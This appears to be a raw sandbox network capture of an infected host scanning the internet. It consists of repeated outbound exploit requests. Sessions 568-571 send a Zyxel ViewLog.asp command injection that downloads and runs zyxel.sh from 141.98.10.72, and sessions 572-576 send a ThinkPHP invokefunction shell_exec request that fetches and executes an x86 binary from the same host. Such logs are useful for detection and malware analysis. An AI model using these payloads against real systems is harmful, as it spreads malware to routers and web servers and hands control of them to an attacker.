Feb 14, 2024 09:31:32.502588034 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
568	192.168.2.15	38396	31.136.0.149	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.777803898 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.424901009 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:15.672796965 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:18.264744043 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:23.384658098 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.368369102 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.591902018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:34.550715923 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
569	192.168.2.15	44546	31.136.98.51	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.794296026 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.488915920 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:15.832807064 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:18.520720959 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:23.896688938 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:34.648324013 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.687917948 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:40.694453001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
570	192.168.2.15	33006	31.136.215.227	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.794400930 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.489044905 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:15.832793951 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:18.520730019 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:23.896684885 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:34.648269892 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.687819004 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:40.694461107 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
571	192.168.2.15	37682	95.86.95.202	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.829433918 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
572	192.168.2.15	47802	112.185.157.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.949038029 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
573	192.168.2.15	55122	95.211.60.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.130736113 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:14.336251020 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:30:12 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
574	192.168.2.15	59074	95.101.241.12	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.533215046 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:14.730300903 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:14 GMT Date: Wed, 14 Feb 2024 08:30:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 65 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 34 26 23 34 36 3b 33 36 32 31 33 39 30 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.6e3f655f.1707899414.36213904</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
575	192.168.2.15	46436	95.101.78.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.535525084 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:14.738217115 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:14 GMT Date: Wed, 14 Feb 2024 08:30:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 35 34 65 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 34 26 23 34 36 3b 31 39 65 36 63 66 36 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.454e655f.1707899414.19e6cf60</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
576	192.168.2.15	58040	95.216.30.50	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.753452063 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
